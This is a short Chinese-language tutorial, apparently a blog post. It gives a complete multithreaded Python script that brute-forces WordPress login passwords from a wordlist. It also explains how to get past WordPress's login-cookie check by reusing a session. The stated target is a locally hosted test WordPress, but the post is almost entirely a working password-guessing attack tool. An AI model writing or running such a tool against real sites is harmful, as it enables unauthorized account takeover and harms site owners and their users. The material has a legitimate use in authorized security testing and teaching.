描述
- 遍历字典,发送requests请求到目标网站,根据响应判断是否登录成功
分析
- SecLists仓库中存放了大量有用的字典文件,我这里用了一个爆破字典cain.txt
- 在本地部署wordpress做测试网站,查看登录页面表单,找到需要构造的字段
- wordpress采取了一个反破解措施:在访问登录页面时,给客户端一个cookie,当客户端提交表单时,网站会检查是否带上这个cookie。反制的办法:用session取代requests去发送请求和提交表单。
代码
from pyquery import PyQuery as pq
from queue import Queue
import requests
import sys
import threading
import time
SUCCESS = "Welcome to WordPress"
TARGET = "http://192.168.43.126/wordpress/wp-login.php"
WORDLIST = "cain.txt"
def get_words():
with open(WORDLIST) as fp:
raw_words = fp.read()
words = Queue()
for word in raw_words.split():
words.put(word)
return words
class Bruter:
def __init__(self, username, url):
self.username = username
self.url = url
self.found = False
print(f"Brute Force Attack begginning on {url}")
print("Finished the setup where username = %s\n" % username)
def run_bruteforce(self, passwords):
for _ in range(10):
t = threading.Thread(target=self.web_bruter, args=(passwords,))
t.start()
def web_bruter(self, passwords):
session = requests.Session()
resp = session.get(self.url)
params = dict()
params['log'] = self.username
while not passwords.empty() and not self.found:
time.sleep(5)
passwd = passwords.get()
print(f"Trying username/password {self.username}/{passwd:<10}")
params['pwd'] = passwd
resp2 = session.post(self.url, data=params)
if SUCCESS in resp2.content.decode():
self.found = True
print(f"BruteForcing succesful.")
print("Username is %s" % self.username)
print("Password is %s\n" % passwd)
print("done: now cleaning up other threads...")
if __name__ == "__main__":
words = get_words()
b = Bruter("test", TARGET)
b.run_bruteforce(words)